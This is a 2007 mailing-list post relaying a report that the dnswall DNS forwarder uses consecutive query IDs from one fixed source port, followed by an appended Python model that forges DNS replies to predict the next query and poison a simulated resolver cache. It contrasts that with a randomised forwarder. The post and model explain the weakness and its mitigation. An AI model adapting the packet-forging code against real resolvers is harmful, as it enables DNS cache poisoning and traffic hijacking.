DNS rebinding partial workaround
Kevin Darcy
kcd at daimlerchrysler.com
Thu Sep 13 23:07:30 UTC 2007
Mordechai T. Abzug wrote:
> One of my coworkers pointed out that the DNS rebinding folks have a
> partial workaround:
>
> http://code.google.com/p/google-dnswall/
>
> It's not much, in that it's specific to private address space, and
> doesn't even touch the name portion of RRs, but it's a start.
>
From the "Issues" tab of that code repository:
Reported by james.raftery <http://code.google.com/u/james.raftery/>,
Aug 16, 2007
dnswall 0.1.3 issues query IDs which are consecutive. As a defence against
reply spoofing, query IDs should not be predictable. For
background information, search Google for "dns predictable query id".
This is compounded by dnswall sending its queries from the same
source port. By observing one query from dnswall on the network I can
predict with 100% certainty the source port and query ID of the next
query and thereby send a spoofed reply to it.
In light of this I consider dnswall to only be safe to use when its
path to the "real" upstream DNS server is certain to be private (e.g.
over a loopback interface on the same machine).
The suggestion in the README file to forward to a remote DNS server, such
as an ISP's resolver, is wholly inappropriate and should be removed in
favour of a strong recommendation for a loopback-only scenario.
- Kevin
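The following is an added example, not code from dnswall, from the issue reporter or from anyone on this thread. It models the weakness the quoted issue describes: a forwarder that hands out consecutive query IDs from one fixed source port, so an attacker who sees a single query on the wire can predict the (port, ID) pair of the next one and forge a reply that the forwarder accepts. The same model with a random ID and a random ephemeral source port per query (the usual mitigation, which the issue only implies) is shown for contrast. The names, the fixed port 40000 and the forged address are constructed for the example; the packets follow the RFC 1035 wire layout but nothing is sent on a real network, and the race against the genuine upstream reply is not modelled.

```python
import secrets
import struct

# Constructed for this example: the name the attacker wants to poison and the
# address it wants the victim to cache for it (203.0.113.0/24 is documentation space).
TARGET_NAME = "bank.example"
FORGED_IP = "203.0.113.66"


def encode_name(name):
    """Encode a dotted name as DNS labels (length byte + label, terminated by 0)."""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def build_query(txid, name):
    """Minimal DNS query: 12-byte header (RD set) plus one A/IN question."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", 1, 1)


def build_answer(txid, name, ip):
    """Forged response: QR/RD/RA set, question echoed, one A record with a long TTL."""
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)
    question = encode_name(name) + struct.pack("!HH", 1, 1)
    # 0xc00c is a compression pointer back to the question name at offset 12.
    rr = b"\xc0\x0c" + struct.pack("!HHIH", 1, 1, 86400, 4)
    return header + question + rr + bytes(int(o) for o in ip.split("."))


def txid_of(packet):
    """Transaction ID is the first 16 bits of the header."""
    return struct.unpack("!H", packet[:2])[0]


class Resolver:
    """Model of a forwarder. Outstanding queries are keyed by (source port, txid);
    a reply is accepted only if it hits an outstanding key, which is exactly the
    check an off-path or on-path spoofer has to satisfy."""

    def __init__(self, next_txid, next_port):
        self._next_txid = next_txid
        self._next_port = next_port
        self.pending = {}
        self.cache = {}

    def send_query(self, name):
        txid = self._next_txid()
        port = self._next_port()
        self.pending[(port, txid)] = name
        return port, build_query(txid, name)

    def receive(self, dst_port, pkt):
        name = self.pending.pop((dst_port, txid_of(pkt)), None)
        if name is None:
            return False          # no matching outstanding query: dropped
        self.cache[name] = ".".join(str(b) for b in pkt[-4:])  # A rdata is the last 4 bytes
        return True


def dnswall_like():
    """The weakness from the issue: consecutive txids and one fixed source port.
    A random starting point for the counter does not help once one query is seen."""
    state = {"id": secrets.randbelow(65536)}

    def next_txid():
        state["id"] = (state["id"] + 1) & 0xFFFF
        return state["id"]

    return Resolver(next_txid, lambda: 40000)   # 40000 is a constructed fixed port


def hardened():
    """Fresh random txid and random ephemeral source port for every query."""
    return Resolver(lambda: secrets.randbelow(65536),
                    lambda: 1024 + secrets.randbelow(65536 - 1024))


def attack(resolver, observed_name="probe.example"):
    """Attacker sees one query on the path, predicts the next (port, txid), and
    sends a forged answer for TARGET_NAME. Returns True if the forgery is accepted."""
    port, pkt = resolver.send_query(observed_name)       # observed on the wire
    predicted_port, predicted_id = port, (txid_of(pkt) + 1) & 0xFFFF
    resolver.send_query(TARGET_NAME)                      # victim's next lookup
    forged = build_answer(predicted_id, TARGET_NAME, FORGED_IP)
    return resolver.receive(predicted_port, forged)


if __name__ == "__main__":
    weak = dnswall_like()
    print("dnswall-like forwarder poisoned:", attack(weak), weak.cache)
    print("randomised forwarder poisoned:", attack(hardened()))
```

Against the dnswall-like forwarder the forgery lands every time; against the randomised one the attacker is back to guessing one pair out of roughly 65536 x 64512, which is why the issue's loopback-only advice is the only safe deployment for a forwarder that cannot randomise both.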